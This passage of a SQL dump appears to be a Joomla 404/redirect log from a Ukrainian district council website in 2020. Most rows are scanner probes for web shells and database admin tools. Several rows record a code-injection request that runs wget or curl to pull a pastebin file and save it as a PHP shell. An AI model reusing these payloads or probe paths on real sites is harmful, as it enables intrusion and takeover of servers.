00:00:00',301),(34652,'https://malyn-rayrada.gov.ua/assets/global/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-05-11 15:52:17','0000-00-00 00:00:00',301),(34653,'https://malyn-rayrada.gov.ua/assets/plugins/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-05-11 15:52:18','0000-00-00 00:00:00',301),(34654,'https://malyn-rayrada.gov.ua/assets/jquery-file-upload/server/php/index.php?secure=1',NULL,'','',1,0,'2020-05-11 15:52:20','0000-00-00 00:00:00',301),(34655,'https://malyn-rayrada.gov.ua/phpformbuilder/plugins/jquery-file-upload/server/php/index.php',NULL,'','',1,0,'2020-05-11 15:52:21','0000-00-00 00:00:00',301),(34656,'https://malyn-rayrada.gov.ua/manager',NULL,'','',1,0,'2020-05-12 06:18:25','0000-00-00 00:00:00',301),(34657,'https://malyn-rayrada.gov.ua/sql',NULL,'','',1,0,'2020-05-13 05:26:07','0000-00-00 00:00:00',301),(34658,'https://malyn-rayrada.gov.ua/adminer-4.2.3.php',NULL,'','',1,0,'2020-05-14 03:40:47','0000-00-00 00:00:00',301),(34659,'https://www.malyn-rayrada.gov.ua/phpminiadmin.php',NULL,'','',1,0,'2020-05-14 07:58:49','0000-00-00 00:00:00',301),(34660,'https://malyn-rayrada.gov.ua/forums/',NULL,'','',1,0,'2020-05-14 18:37:11','0000-00-00 00:00:00',301),(34661,'https://malyn-rayrada.gov.ua/vb/',NULL,'','',1,0,'2020-05-14 18:37:11','0000-00-00 00:00:00',301),(34662,'https://malyn-rayrada.gov.ua/vbb/',NULL,'','',1,0,'2020-05-14 18:37:11','0000-00-00 00:00:00',301),(34663,'https://malyn-rayrada.gov.ua/vb3/',NULL,'','',1,0,'2020-05-14 18:37:11','0000-00-00 00:00:00',301),(34664,'https://malyn-rayrada.gov.ua/index.php/1383-do-vidoma-deputativ-malinskoji-rajonnoji-radi-6-ta-7-sklikan',NULL,'','',9,0,'2020-05-15 06:55:55','0000-00-00 00:00:00',301),(34665,'https://malyn-rayrada.gov.ua/index.php/1406-pro-dotrimannya-zakonu-ukrajini-pro-dostup-do-publichnoji-informatsiji-ta-reglamentu-roboti-rajonnoji-radi-vii-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2020-05-15 06:56:06','0000-00-00 00:00:00',301),(34666,'https://www.malyn-rayrada.gov.ua/index.php/1351-sotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-2015-rik',NULL,'','',3,0,'2020-05-15 07:09:21','0000-00-00 00:00:00',301),(34667,'https://www.malyn-rayrada.gov.ua/index.php/1401-vidbulas-5-sesiya-malinskoji-rajonnoji-radi',NULL,'','',2,0,'2020-05-15 07:09:49','0000-00-00 00:00:00',301),(34668,'https://www.malyn-rayrada.gov.ua/index.php/1383-do-vidoma-deputativ-malinskoji-rajonnoji-radi-6-ta-7-sklikan',NULL,'','',3,0,'2020-05-15 13:18:20','0000-00-00 00:00:00',301),(34669,'https://malyn-rayrada.gov.ua/cache/blackhat.php',NULL,'http://site.ru','',5,0,'2020-05-18 09:28:44','0000-00-00 00:00:00',301),(34670,'https://malyn-rayrada.gov.ua/wp-defence.php',NULL,'http://site.ru','',3,0,'2020-05-18 11:30:39','0000-00-00 00:00:00',301),(34671,'https://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',4,0,'2020-05-18 14:00:19','0000-00-00 00:00:00',301),(34672,'https://malyn-rayrada.gov.ua/components/admin.php',NULL,'http://site.ru','',4,0,'2020-05-18 14:03:52','0000-00-00 00:00:00',301),(34673,'https://malyn-rayrada.gov.ua/cache/wp-defence.php',NULL,'http://site.ru','',3,0,'2020-05-18 14:04:19','0000-00-00 00:00:00',301),(34674,'https://malyn-rayrada.gov.ua/cache/ganks.php.php',NULL,'http://site.ru','',18,0,'2020-05-18 14:32:40','0000-00-00 00:00:00',301),(34675,'https://malyn-rayrada.gov.ua/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',10,0,'2020-05-18 14:35:14','0000-00-00 00:00:00',301),(34676,'https://malyn-rayrada.gov.ua/libraries/joomla/template/midou.php',NULL,'http://site.ru','',6,0,'2020-05-18 14:37:21','0000-00-00 00:00:00',301),(34677,'https://malyn-rayrada.gov.ua/components/com_wrapper/links.php',NULL,'http://site.ru','',4,0,'2020-05-18 14:57:39','0000-00-00 00:00:00',301),(34678,'https://malyn-rayrada.gov.ua/data.php',NULL,'http://site.ru','',4,0,'2020-05-18 15:02:11','0000-00-00 00:00:00',301),(34679,'https://malyn-rayrada.gov.ua/cache/doc.php',NULL,'http://site.ru','',6,0,'2020-05-18 15:22:46','0000-00-00 00:00:00',301),(34680,'https://malyn-rayrada.gov.ua/plugins/editors/tinymce/field/index.php',NULL,'http://site.ru','',2,0,'2020-05-18 15:25:45','0000-00-00 00:00:00',301),(34681,'https://malyn-rayrada.gov.ua/components/com_content/green.php',NULL,'http://site.ru','',6,0,'2020-05-18 15:33:07','0000-00-00 00:00:00',301),(34682,'https://malyn-rayrada.gov.ua/cache/css.php',NULL,'http://site.ru','',5,0,'2020-05-18 15:44:19','0000-00-00 00:00:00',301),(34683,'https://malyn-rayrada.gov.ua/wp-content/themes/twentynineteen/style.php',NULL,'http://site.ru','',9,0,'2020-05-18 15:49:09','0000-00-00 00:00:00',301),(34684,'https://malyn-rayrada.gov.ua/components/com_user/views/reset/mod.php',NULL,'http://site.ru','',6,0,'2020-05-18 15:51:58','0000-00-00 00:00:00',301),(34685,'https://malyn-rayrada.gov.ua/components/com_users/user.php',NULL,'http://site.ru','',5,0,'2020-05-18 16:16:22','0000-00-00 00:00:00',301),(34686,'https://malyn-rayrada.gov.ua/components/com_banners/helpers/images.php',NULL,'http://site.ru','',6,0,'2020-05-18 16:23:32','0000-00-00 00:00:00',301),(34687,'https://malyn-rayrada.gov.ua/ganks.php.php',NULL,'http://site.ru','',5,0,'2020-05-18 18:14:00','0000-00-00 00:00:00',301),(34688,'https://malyn-rayrada.gov.ua/adminer-4.4.0.php',NULL,'','',1,0,'2020-05-18 18:30:31','0000-00-00 00:00:00',301),(34689,'https://malyn-rayrada.gov.ua/modules/mod_insider/mod_insider.php',NULL,'http://site.ru','',3,0,'2020-05-18 19:06:07','0000-00-00 00:00:00',301),(34690,'https://malyn-rayrada.gov.ua/wp-json/',NULL,'','',1,0,'2020-05-18 19:15:34','0000-00-00 00:00:00',301),(34691,'https://malyn-rayrada.gov.ua/adminer-4.5.0.php',NULL,'','',1,0,'2020-05-19 16:55:48','0000-00-00 00:00:00',301),(34692,'https://malyn-rayrada.gov.ua/adminer-4.6.0.php',NULL,'','',1,0,'2020-05-20 14:54:26','0000-00-00 00:00:00',301),(34693,'https://malyn-rayrada.gov.ua/e/admin/index.php',NULL,'','',2,0,'2020-05-23 03:06:08','0000-00-00 00:00:00',301),(34694,'https://malyn-rayrada.gov.ua/adminer-4.6.3.php',NULL,'','',1,0,'2020-05-23 11:07:56','0000-00-00 00:00:00',301),(34695,'https://malyn-rayrada.gov.ua/modules/columnadverts/slides/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:45','0000-00-00 00:00:00',301),(34696,'https://malyn-rayrada.gov.ua/modules/vtemslideshow/slides/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:49','0000-00-00 00:00:00',301),(34697,'https://malyn-rayrada.gov.ua/modules/simpleslideshow/slides/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:51','0000-00-00 00:00:00',301),(34698,'https://malyn-rayrada.gov.ua/modules/vtemskitter/uploadimage.php',NULL,'','',1,0,'2020-05-23 17:25:52','0000-00-00 00:00:00',301),(34699,'https://malyn-rayrada.gov.ua/modules/vtemskitter/img/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:53','0000-00-00 00:00:00',301),(34700,'https://malyn-rayrada.gov.ua/modules/fieldvmegamenu/ajax/upload.php',NULL,'','',1,0,'2020-05-23 17:25:54','0000-00-00 00:00:00',301),(34701,'https://malyn-rayrada.gov.ua/modules/fieldvmegamenu/uploads/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:55','0000-00-00 00:00:00',301),(34702,'https://malyn-rayrada.gov.ua/modules/pk_flexmenu/ajax/upload.php',NULL,'','',1,0,'2020-05-23 17:25:57','0000-00-00 00:00:00',301),(34703,'https://malyn-rayrada.gov.ua/modules/pk_flexmenu/uploads/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:25:57','0000-00-00 00:00:00',301),(34704,'https://malyn-rayrada.gov.ua/modules/pk_vertflexmenu/ajax/upload.php',NULL,'','',1,0,'2020-05-23 17:25:59','0000-00-00 00:00:00',301),(34705,'https://malyn-rayrada.gov.ua/modules/pk_vertflexmenu/uploads/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:26:00','0000-00-00 00:00:00',301),(34706,'https://malyn-rayrada.gov.ua/modules/wg24themeadministration/wg24_ajax.php',NULL,'','',1,0,'2020-05-23 17:26:02','0000-00-00 00:00:00',301),(34707,'https://malyn-rayrada.gov.ua/modules/wg24themeadministration/img/upload/holapresme_49385.php',NULL,'','',1,0,'2020-05-23 17:26:03','0000-00-00 00:00:00',301),(34708,'https://malyn-rayrada.gov.ua/modules/bamegamenu/ajax_phpcode.php?code=passthru(\"wget https://pastebin.com/raw/d1xfc0ak -o holapresme_49385.php\");',NULL,'','',1,0,'2020-05-23 17:26:07','0000-00-00 00:00:00',301),(34709,'https://malyn-rayrada.gov.ua/modules/bamegamenu/holapresme_49385.php',NULL,'','',4,0,'2020-05-23 17:26:09','0000-00-00 00:00:00',301),(34710,'https://malyn-rayrada.gov.ua/modules/bamegamenu/ajax_phpcode.php?code=system(\"wget https://pastebin.com/raw/d1xfc0ak -o holapresme_49385.php\");',NULL,'','',1,0,'2020-05-23 17:26:12','0000-00-00 00:00:00',301),(34711,'https://malyn-rayrada.gov.ua/modules/bamegamenu/ajax_phpcode.php?code=passthru(\"curl https://pastebin.com/raw/d1xfc0ak -o holapresme_49385.php\");',NULL,'','',1,0,'2020-05-23 17:26:16','0000-00-00 00:00:00',301),(34712,'https://malyn-rayrada.gov.ua/modules/bamegamenu/ajax_phpcode.php?code=system(\"curl https://pastebin.com/raw/d1xfc0ak -o holapresme_49385.php\");',NULL,'','',1,0,'2020-05-23 17:26:18','0000-00-00 00:00:00',301),(34713,'https://malyn-rayrada.gov.ua/adminer-4.7.0.php',NULL,'','',1,0,'2020-05-24 09:20:25','0000-00-00 00:00:00',301),(34714,'https://malyn-rayrada.gov.ua/adminer-4.7.1.php',NULL,'','',1,0,'2020-05-25 07:29:22','0000-00-00 00:00:00',301),(34715,'https://malyn-rayrada.gov.ua/dns-query',NULL,'','',1,0,'2020-05-26 02:27:04','0000-00-00 00:00:00',301),(34716,'https://malyn-rayrada.gov.ua/adminer-4.7.2.php',NULL,'','',1,0,'2020-05-26 05:45:38','0000-00-00 00:00:00',301),(34717,'https://www.malyn-rayrada.gov.ua/attachments/article/2144/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ñ‚ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2020-05-26 08:36:50','0000-00-00 00:00:00',301),(34718,'https://malyn-rayrada.gov.ua/adminer-4.7.3.php',NULL,'','',1,0,'2020-05-27 04:00:42','0000-00-00 00:00:00',301),(34719,'https://malyn-rayrada.gov.ua/adminer-4.7.4.php',NULL,'','',1,0,'2020-05-28 02:05:18','0000-00-00 00:00:00',301),(34720,'https://malyn-rayrada.gov.ua/adminer-4.7.5.php',NULL,'','',1,0,'2020-05-29 00:00:25','0000-00-00 00:00:00',301),(34721,'https://malyn-rayrada.gov.ua/components/com_newsfeeds/views/wp-side.php',NULL,'http://site.ru','',2,0,'2020-05-29 06:03:03','0000-00-00 00:00:00',301),(34722,'https://malyn-rayrada.gov.ua/media/editors/tinymce/plugins/template/ix.php.php',NULL,'http://site.ru','',2,0,'2020-05-29 06:03:06','0000-00-00 00:00:00',301),(34723,'https://malyn-rayrada.gov.ua/images/banners/streamed.php',NULL,'http://site.ru','',2,0,'2020-05-29 06:04:14','0000-00-00 00:00:00',301),(34724,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_newsfeeds/category/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 06:20:49','0000-00-00 00:00:00',301),(34725,'https://malyn-rayrada.gov.ua/images/sampledata/parks/landscape/wp-side.php',NULL,'http://site.ru','',1,0,'2020-05-29 06:25:37','0000-00-00 00:00:00',301),(34726,'https://malyn-rayrada.gov.ua/components/com_finder/1.php',NULL,'http://site.ru','',1,0,'2020-05-29 06:30:18','0000-00-00 00:00:00',301),(34727,'https://malyn-rayrada.gov.ua/appdemo/app/plugins/sparkline/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 06:49:16','0000-00-00 00:00:00',301),(34728,'https://malyn-rayrada.gov.ua/libraries/joomla/http/transport/.h..php',NULL,'http://site.ru','',3,0,'2020-05-29 06:50:58','0000-00-00 00:00:00',301),(34729,'https://malyn-rayrada.gov.ua/xbvdwktabo.php',NULL,'http://site.ru','',3,0,'2020-05-29 06:51:29','0000-00-00 00:00:00',301),(34730,'https://malyn-rayrada.gov.ua/tmp/mfplhd.php',NULL,'http://site.ru','',2,0,'2020-05-29 06:51:57','0000-00-00 00:00:00',301),(34731,'https://malyn-rayrada.gov.ua/templates/beez/javascript/tools.php',NULL,'http://site.ru','',2,0,'2020-05-29 06:57:05','0000-00-00 00:00:00',301),(34732,'https://malyn-rayrada.gov.ua/tmp/rgkwxt.php',NULL,'http://site.ru','',2,0,'2020-05-29 07:14:35','0000-00-00 00:00:00',301),(34733,'https://malyn-rayrada.gov.ua/images/headers/1.php',NULL,'http://site.ru','',1,0,'2020-05-29 07:17:58','0000-00-00 00:00:00',301),(34734,'https://malyn-rayrada.gov.ua/plugins/editors/none/wp-side.php',NULL,'http://site.ru','',2,0,'2020-05-29 07:39:26','0000-00-00 00:00:00',301),(34735,'https://malyn-rayrada.gov.ua/templates/beez3/404.php',NULL,'http://site.ru','',1,0,'2020-05-29 07:39:29','0000-00-00 00:00:00',301),(34736,'https://malyn-rayrada.gov.ua/layouts/joomla/searchtools/grid/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 07:41:00','0000-00-00 00:00:00',301),(34737,'https://malyn-rayrada.gov.ua/components/com_content/1.php',NULL,'http://site.ru','',1,0,'2020-05-29 07:45:31','0000-00-00 00:00:00',301),(34738,'https://malyn-rayrada.gov.ua/images/banners/beautifu.php',NULL,'http://site.ru','',2,0,'2020-05-29 08:04:32','0000-00-00 00:00:00',301),(34739,'https://malyn-rayrada.gov.ua/libraries/framework/symfony/component/yaml/bag.php',NULL,'http://site.ru','',2,0,'2020-05-29 08:07:52','0000-00-00 00:00:00',301),(34740,'https://malyn-rayrada.gov.ua/templates/system/data.php',NULL,'http://site.ru','',3,0,'2020-05-29 08:36:14','0000-00-00 00:00:00',301),(34741,'https://malyn-rayrada.gov.ua/libraries/fof/dispatcher/data.php',NULL,'http://site.ru','',4,0,'2020-05-29 08:50:52','0000-00-00 00:00:00',301),(34742,'https://malyn-rayrada.gov.ua/modules/mod_custom/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 09:11:08','0000-00-00 00:00:00',301),(34743,'https://malyn-rayrada.gov.ua/new/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 09:17:59','0000-00-00 00:00:00',301),(34744,'https://malyn-rayrada.gov.ua/tmp/chwvvn.php',NULL,'http://site.ru','',2,0,'2020-05-29 09:20:05','0000-00-00 00:00:00',301),(34745,'https://malyn-rayrada.gov.ua/cache/list.php',NULL,'http://site.ru','',3,0,'2020-05-29 09:23:16','0000-00-00 00:00:00',301),(34746,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_contact/categories/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 09:39:18','0000-00-00 00:00:00',301),(34747,'https://malyn-rayrada.gov.ua/appdemo/app/plugins/jquery/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 09:41:25','0000-00-00 00:00:00',301),(34748,'https://malyn-rayrada.gov.ua/as.php',NULL,'http://site.ru','',2,0,'2020-05-29 09:41:26','0000-00-00 00:00:00',301),(34749,'https://malyn-rayrada.gov.ua/media/k2/assets/vendors/studio-42/elfinder.1/js/proxy/data.php',NULL,'http://site.ru','',3,0,'2020-05-29 10:01:20','0000-00-00 00:00:00',301),(34750,'https://malyn-rayrada.gov.ua/libraries/cms/plugin/mashaji2.php',NULL,'http://site.ru','',1,0,'2020-05-29 10:53:46','0000-00-00 00:00:00',301),(34751,'https://malyn-rayrada.gov.ua/layouts/joomla/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 10:57:11','0000-00-00 00:00:00',301),(34752,'https://malyn-rayrada.gov.ua/templates/protostar/html/layouts/a.php',NULL,'http://site.ru','',2,0,'2020-05-29 10:58:36','0000-00-00 00:00:00',301),(34753,'https://malyn-rayrada.gov.ua/components/com_contact/controller.lib.php',NULL,'http://site.ru','',1,0,'2020-05-29 10:58:41','0000-00-00 00:00:00',301),(34754,'https://malyn-rayrada.gov.ua/libraries/imports.legacy.php',NULL,'http://site.ru','',2,0,'2020-05-29 11:07:23','0000-00-00 00:00:00',301),(34755,'https://malyn-rayrada.gov.ua/images/admin.php',NULL,'http://site.ru','',3,0,'2020-05-29 11:22:10','0000-00-00 00:00:00',301),(34756,'https://malyn-rayrada.gov.ua/includes/new_defines.php',NULL,'http://site.ru','',3,0,'2020-05-29 11:27:51','0000-00-00 00:00:00',301),(34757,'https://malyn-rayrada.gov.ua/wp-admin/images/1index.php',NULL,'http://site.ru','',4,0,'2020-05-29 11:48:43','0000-00-00 00:00:00',301),(34758,'https://malyn-rayrada.gov.ua/images/sampledata/parks/animals/beautifu.php',NULL,'http://site.ru','',2,0,'2020-05-29 12:26:05','0000-00-00 00:00:00',301),(34759,'https://malyn-rayrada.gov.ua/6x64.php',NULL,'http://site.ru','',1,0,'2020-05-29 12:39:25','0000-00-00 00:00:00',301),(34760,'https://malyn-rayrada.gov.ua/libraries/cms/search/data.php',NULL,'http://site.ru','',7,0,'2020-05-29 12:39:57','0000-00-00 00:00:00',301),(34761,'https://malyn-rayrada.gov.ua/components/404.php',NULL,'http://site.ru','',2,0,'2020-05-29 12:44:43','0000-00-00 00:00:00',301),(34762,'https://malyn-rayrada.gov.ua/wso2.php',NULL,'http://site.ru','',5,0,'2020-05-29 13:10:37','0000-00-00 00:00:00',301),(34763,'https://malyn-rayrada.gov.ua/okehmnrdib.php',NULL,'http://site.ru','',4,0,'2020-05-29 13:12:02','0000-00-00 00:00:00',301),(34764,'https://malyn-rayrada.gov.ua/media/editors/tinymce/plugins/nonbreaking/5e1779ce492ac.php',NULL,'http://site.ru','',2,0,'2020-05-29 13:18:10','0000-00-00 00:00:00',301),(34765,'https://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/images.php',NULL,'http://site.ru','',1,0,'2020-05-29 13:19:03','0000-00-00 00:00:00',301),(34766,'https://malyn-rayrada.gov.ua/components/com_config/view/cms/beautifu.php',NULL,'http://site.ru','',7,0,'2020-05-29 13:46:02','0000-00-00 00:00:00',301),(34767,'https://malyn-rayrada.gov.ua/images/c99.php',NULL,'http://site.ru','',2,0,'2020-05-29 14:07:18','0000-00-00 00:00:00',301),(34768,'https://malyn-rayrada.gov.ua/xs.php',NULL,'http://site.ru','',2,0,'2020-05-29 14:08:31','0000-00-00 00:00:00',301),(34769,'https://malyn-rayrada.gov.ua/libraries/joomla/updater/beautifu.php',NULL,'http://site.ru','',7,0,'2020-05-29 14:08:46','0000-00-00 00:00:00',301),(34770,'https://malyn-rayrada.gov.ua/components/com_config/view/streamed.php',NULL,'http://site.ru','',1,0,'2020-05-29 16:33:35','0000-00-00 00:00:00',301),(34771,'https://malyn-rayrada.gov.ua/jascondienterprises.com/doc.php',NULL,'http://site.ru','',1,0,'2020-05-29 16:33:38','0000-00-00 00:00:00',301),(34772,'https://malyn-rayrada.gov.ua/modules/mod_bt_simple_slideshow/tmpl/images/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 16:33:57','0000-00-00 00:00:00',301),(34773,'https://malyn-rayrada.gov.ua/cli/oi.php',NULL,'http://site.ru','',5,0,'2020-05-29 16:41:27','0000-00-00 00:00:00',301),(34774,'https://malyn-rayrada.gov.ua/components/com_content/controllers/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 16:53:27','0000-00-00 00:00:00',301),(34775,'https://malyn-rayrada.gov.ua/wsi.php',NULL,'http://site.ru','',4,0,'2020-05-29 16:53:56','0000-00-00 00:00:00',301),(34776,'https://malyn-rayrada.gov.ua/images/sampledata/parks/animals/streamed.php',NULL,'http://site.ru','',2,0,'2020-05-29 16:55:48','0000-00-00 00:00:00',301),(34777,'https://malyn-rayrada.gov.ua/templates/beez3/html/com_content/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 16:57:35','0000-00-00 00:00:00',301),(34778,'https://malyn-rayrada.gov.ua/libraries/fof/hal/render/data.php',NULL,'http://site.ru','',2,0,'2020-05-29 17:24:38','0000-00-00 00:00:00',301),(34779,'https://malyn-rayrada.gov.ua/logs/data.php',NULL,'http://site.ru','',9,0,'2020-05-29 17:54:28','0000-00-00 00:00:00',301),(34780,'https://malyn-rayrada.gov.ua/libraries/framework/joomla/application/cli/output/data.php',NULL,'http://site.ru','',6,0,'2020-05-29 17:59:00','0000-00-00 00:00:00',301),(34781,'https://malyn-rayrada.gov.ua/templates/venus/images/presets/preset1/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 18:05:15','0000-00-00 00:00:00',301),(34782,'https://malyn-rayrada.gov.ua/templates/beez3/wp-info.php',NULL,'http://site.ru','',3,0,'2020-05-29 18:21:46','0000-00-00 00:00:00',301),(34783,'https://malyn-rayrada.gov.ua/libraries/wp-imags.php',NULL,'http://site.ru','',5,0,'2020-05-29 18:22:47','0000-00-00 00:00:00',301),(34784,'https://malyn-rayrada.gov.ua/plugins/404.php',NULL,'http://site.ru','',1,0,'2020-05-29 18:26:11','0000-00-00 00:00:00',301),(34785,'https://malyn-rayrada.gov.ua/gs.php',NULL,'http://site.ru','',2,0,'2020-05-29 18:47:13','0000-00-00 00:00:00',301),(34786,'https://malyn-rayrada.gov.ua/images/banners/.h..php',NULL,'http://site.ru','',3,0,'2020-05-29 18:54:53','0000-00-00 00:00:00',301),(34787,'https://malyn-rayrada.gov.ua/components/com_banners/models/data.php',NULL,'http://site.ru','',8,0,'2020-05-29 19:14:16','0000-00-00 00:00:00',301),(34788,'https://malyn-rayrada.gov.ua/libraries/404.php',NULL,'http://site.ru','',11,0,'2020-05-29 19:18:08','0000-00-00 00:00:00',301),(34789,'https://malyn-rayrada.gov.ua/domains/xspace.sk/libraries/joomla/template/mide.php',NULL,'http://site.ru','',1,0,'2020-05-29 19:18:43','0000-00-00 00:00:00',301),(34790,'https://malyn-rayrada.gov.ua/baby.php',NULL,'http://site.ru','',4,0,'2020-05-29 19:19:08','0000-00-00 00:00:00',301),(34791,'https://malyn-rayrada.gov.ua/debedcsfni.php',NULL,'http://site.ru','',3,0,'2020-05-29 19:21:03','0000-00-00 00:00:00',301),(34792,'https://malyn-rayrada.gov.ua/language/ru-ru/gank.php.php',NULL,'http://site.ru','',6,0,'2020-05-29 19:22:55','0000-00-00 00:00:00',301),(34793,'https://malyn-rayrada.gov.ua/wp-admin/css/common.php',NULL,'http://site.ru','',3,0,'2020-05-29 19:27:00','0000-00-00 00:00:00',301),(34794,'https://malyn-rayrada.gov.ua/wp-site.php',NULL,'http://site.ru','',3,0,'2020-05-29 19:33:20','0000-00-00 00:00:00',301),(34795,'https://malyn-rayrada.gov.ua/seller.php',NULL,'http://site.ru','',1,0,'2020-05-29 19:50:28','0000-00-00 00:00:00',301),(34796,'https://malyn-rayrada.gov.ua/libraries/cms/layout/data.php',NULL,'http://site.ru','',1,0,'2020-05-29 19:53:43','0000-00-00 00:00:00',301),(34797,'https://malyn-rayrada.gov.ua/components/logs.php',NULL,'http://site.ru','',3,0,'2020-05-29 20:15:25','0000-00-00 00:00:00',301),(34798,'https://malyn-rayrada.gov.ua/media/editors/tinymce/plugins/.h..php',NULL,'http://site.ru','',1,0,'2020-05-29 20:16:45','0000-00-00 00:00:00',301),(34799,'https://malyn-rayrada.gov.ua/adminer-4.7.6.php',NULL,'','',1,0,'2020-05-29 22:09:42','0000-00-00 00:00:00',301),(34800,'https://malyn-rayrada.gov.ua/media/media/css/data.php',NULL,'http://site.ru','',3,0,'2020-05-30 10:50:27','0000-00-00 00:00:00',301),(34801,'https://malyn-rayrada.gov.ua/assets/images/doc.php',NULL,'http://site.ru','',5,0,'2020-05-30 10:51:38','0000-00-00 00:00:00',301),(34802,'https://malyn-rayrada.gov.ua/assets/images/wp-plugins.php',NULL,'http://site.ru','',7,0,'2020-05-30 10:52:03','0000-00-00 00:00:00',301),(34803,'https://malyn-rayrada.gov.ua/components/com_foxcontact/af.php',NULL,'http://site.ru','',1,0,'2020-05-30 11:18:05','0000-00-00 00:00:00',301),(34804,'https://malyn-rayrada.gov.ua/cache/wp-plugins.php',NULL,'http://site.ru','',11,0,'2020-05-30 11:20:13','0000-00-00 00:00:00',301),(34805,'https://malyn-rayrada.gov.ua/components/com_contact/views/categories/tmpl/.h..php',NULL,'http://site.ru','',4,0,'2020-05-30 11:20:50','0000-00-00 00:00:00',301),(34806,'https://malyn-rayrada.gov.ua/cli/shoes.php',NULL,'http://site.ru','',2,0,'2020-05-30 11:31:25','0000-00-00 00:00:00',301),(34807,'https://malyn-rayrada.gov.ua/hours.php',NULL,'http://site.ru','',14,0,'2020-05-30 11:48:32','0000-00-00 00:00:00',301),(34808,'https://malyn-rayrada.gov.ua/libraries/framework/joomla/application/cli/output/streamed.php',NULL,'http://site.ru','',3,0,'2020-05-30 12:16:59','0000-00-00 00:00:00',301),(34809,'https://malyn-rayrada.gov.ua/libraries/fof/config/data.php',NULL,'http://site.ru','',12,0,'2020-05-30 12:19:00','0000-00-00 00:00:00',301),(34810,'https://malyn-rayrada.gov.ua/media/editors/tinymce/plugins/noneditable/bag.php',NULL,'http://site.ru','',2,0,'2020-05-30 12:46:48','0000-00-00 00:00:00',301),(34811,'https://malyn-rayrada.gov.ua/wp-plugins.php',NULL,'http://site.ru','',13,0,'2020-05-30 12:57:47','0000-00-00 00:00:00',301),(34812,'https://malyn-rayrada.gov.ua/cli/wool.php',NULL,'http://site.ru','',3,0,'2020-05-30 13:47:43','0000-00-00 00:00:00',301),(34813,'https://malyn-rayrada.gov.ua/xopgwfrjoy.php',NULL,'http://site.ru','',6,0,'2020-05-30 13:49:30','0000-00-00 00:00:00',301),(34814,'https://malyn-rayrada.gov.ua/gank.php.php',NULL,'http://site.ru','',8,0,'2020-05-30 14:12:58','0000-00-00 00:00:00',301),(34815,'https://malyn-rayrada.gov.ua/87/5.php',NULL,'http://site.ru','',11,0,'2020-05-30 14:14:02','0000-00-00 00:00:00',301),(34816,'https://malyn-rayrada.gov.ua/domains/xspace.sk/libraries/joomla/template/mark.php',NULL,'http://site.ru','',3,0,'2020-05-30 17:05:11','0000-00-00 00:00:00',301),(34817,'https://malyn-rayrada.gov.ua/images/wp-img.php',NULL,'http://site.ru','',3,0,'2020-05-30 17:07:03','0000-00-00 00:00:00',301),(34818,'https://malyn-rayrada.gov.ua/adminer-4.2.3-en.php',NULL,'','',1,0,'2020-05-30 20:10:50','0000-00-00 00:00:00',301),(34819,'https://malyn-rayrada.gov.ua/adminer-4.2.4-en.php',NULL,'','',1,0,'2020-05-31 18:07:21','0000-00-00 00:00:00',301),(34820,'https://malyn-rayrada.gov.ua/index.php/1764-nekrolog-2',NULL,'','',2,0,'2020-06-04 14:57:15','0000-00-00 00:00:00',301),(34821,'https://malyn-rayrada.gov.ua/fckeditor/editor/filemanager/upload/test.html',NULL,'','',2,0,'2020-06-04 23:21:04','0000-00-00 00:00:00',301),(34822,'https://malyn-rayrada.gov.ua/admin/fckeditor/editor/filemanager/connectors/uploadtest.html',NULL,'','',1,0,'2020-06-04 23:21:05','0000-00-00 00:00:00',301),(34823,'https://www.malyn-rayrada.gov.ua/index.php/1586-ukrajina-vtrete-vidznachae-den-gidnosti-i-svobodi',NULL,'','',1,0,'2020-06-05 14:06:54','0000-00-00 00:00:00',301),(34824,'https://malyn-rayrada.gov.ua/mysql/',NULL,'','',1,0,'2020-06-05 20:52:33','0000-00-00 00:00:00',301),(34825,'https://malyn-rayrada.gov.ua/adminer-4.6.3-en.php',NULL,'','',1,0,'2020-06-09 01:05:49','0000-00-00 00:00:00',301),(34826,'https://malyn-rayrada.gov.ua/include/dialog/select_soft_post.php',NULL,'','',2,0,'2020-06-09 22:31:44','0000-00-00 00:00:00',301),(34827,'https://malyn-rayrada.gov.ua/adminer-4.7.0-en.php',NULL,'','',1,0,'2020-06-09 23:44:52','0000-00-00 00:00:00',301),(34828,'https://malyn-rayrada.gov.ua/index.php/1603-povidomlennya-pro-rezultati-mistsevikh-viboriv',NULL,'','',6,0,'2020-06-10 06:09:06','0000-00-00 00:00:00',301),(34829,'https://malyn-rayrada.gov.ua/adminer-4.7.1-en.php',NULL,'','',1,0,'2020-06-10 22:20:41','0000-00-00 00:00:00',301),(34830,'https://malyn-rayrada.gov.ua/adminer-4.7.2-en.php',NULL,'','',1,0,'2020-06-11 21:32:24','0000-00-00 